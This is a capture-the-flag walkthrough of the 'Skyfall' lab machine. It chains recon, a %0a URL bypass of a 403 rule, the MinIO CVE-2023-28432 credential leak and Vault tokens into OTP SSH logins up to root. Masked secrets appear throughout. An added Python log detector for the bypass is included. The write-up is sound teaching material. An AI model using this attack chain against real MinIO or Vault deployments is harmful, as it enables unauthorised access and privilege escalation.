Skyfall
Recon
Let's start with an nmap scan.
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 skyfall.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:29 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 skyfall.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:31 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
Let's visit the website. It looks like a cloud storage service. We are also able to find a team section and 3 email IDs.
Directory enumeration uncovered multiple image assets, which are not deemed valuable. Subsequently, subdomain enumeration using ffuf revealed the presence of a subdomain named demo.skyfall.htb. Let's explore this subdomain to gather additional information.

Initial Access
We have a login page with demo login details: guest:guest.


On the left panel, there is an entry labeled "MinIO Metrics." However, attempting to access MinIO Metrics directly results in a 403 Forbidden error. This access restriction can be circumvented by appending %0a at the end of the URL.
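A defender can spot this kind of bypass in the reverse proxy's access log. The added example below (not part of the original writeup) flags requests whose path contains a percent-encoded control character and resolves to a restricted path once that character is stripped. The nginx combined log format, the /metrics path, the client addresses and the log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Percent-encoded control characters (0x00-0x1f, 0x7f) in the request path.
ENCODED_CTRL = re.compile(r"%(?:[01][0-9a-fA-F]|7[fF])")
# nginx "combined" format: ip - user [time] "METHOD target PROTO" status bytes ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_bypass_candidates(lines, restricted_prefixes):
    """Return (ip, target, status, served) for requests whose path carries an
    encoded control character and, once decoded and stripped, is a restricted path."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        if not ENCODED_CTRL.search(path):
            continue
        # The path a backend that drops control bytes would end up routing on.
        normalized = "".join(ch for ch in unquote(path) if ch.isprintable())
        if any(normalized == p or normalized.startswith(p + "/")
               for p in restricted_prefixes):
            # served=True means the deny rule did not fire (2xx response).
            hits.append((ip, target, int(status), status.startswith("2")))
    return hits

# Constructed sample log lines (path and addresses are assumptions).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2024:07:40:01 +0100] "GET /metrics HTTP/1.1" 403 162 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [09/Apr/2024:07:40:09 +0100] "GET /metrics%0a HTTP/1.1" 200 4512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [09/Apr/2024:07:41:00 +0100] "GET /files?name=a%0ab HTTP/1.1" 200 900 "-" "curl/8.5.0"',
    '192.0.2.12 - - [09/Apr/2024:07:42:00 +0100] "GET /metrics%0A%0D HTTP/1.1" 403 162 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for ip, target, status, served in find_bypass_candidates(SAMPLE_LOG, ["/metrics"]):
        print(f"{'SERVED ' if served else 'blocked'} {ip} {target} -> {status}")
```

A hit with a 2xx status means the proxy's deny rule and the backend's routing disagree about the path; the durable fix is to reject or normalize such paths at the proxy before the access rule is evaluated.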

We can see a URL at the endpoint.
http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
MinIO is reported to be affected by CVE-2023-28432, an information disclosure vulnerability. Exploiting it can expose sensitive information.
We can use this GitHub link to exploit this vulnerability:

We've obtained:
"MINIO_ROOT_USER": "5Gr*****************"
"MINIO_ROOT_PASSWORD": "Gkp*****************"
To install the MinIO client, follow the steps at:
Now let’s run the MinIO client.
mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5Gr***************** Gkp*****************
Let’s check for files.
mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. Let's download those files and decompress them.

Upon further enumeration of files with the .gz extension, we found these.
export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.*****************************************"

To install Vault, we first have to download the Vault binary.
Add “prd23-vault-internal.skyfall.htb” to the /etc/hosts file. Then, run the following commands:
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.**************************************************"
We can log in now.

When we list the SSH roles, we see different roles, but for now we can only access dev_otp_key_role.

To obtain user access, run the following command. Vault generates an OTP, which we use as the password for the SSH connection:
./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

We've got our first flag.
Privilege Escalation
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal ^-c /etc/vault-unseal.yaml -[vhd]+$
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
Upon executing the following command, we observe the creation of a debug.log file.

Upon inspecting the debug.log file, we discover an additional Vault Token.

Next, we must replace our current Vault token with the new one.
export VAULT_TOKEN=hvs.I0e*********************
With the role set to admin_otp_key_role, we can log in as root.
vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no root@10.10.11.254

We are root and have our root flag.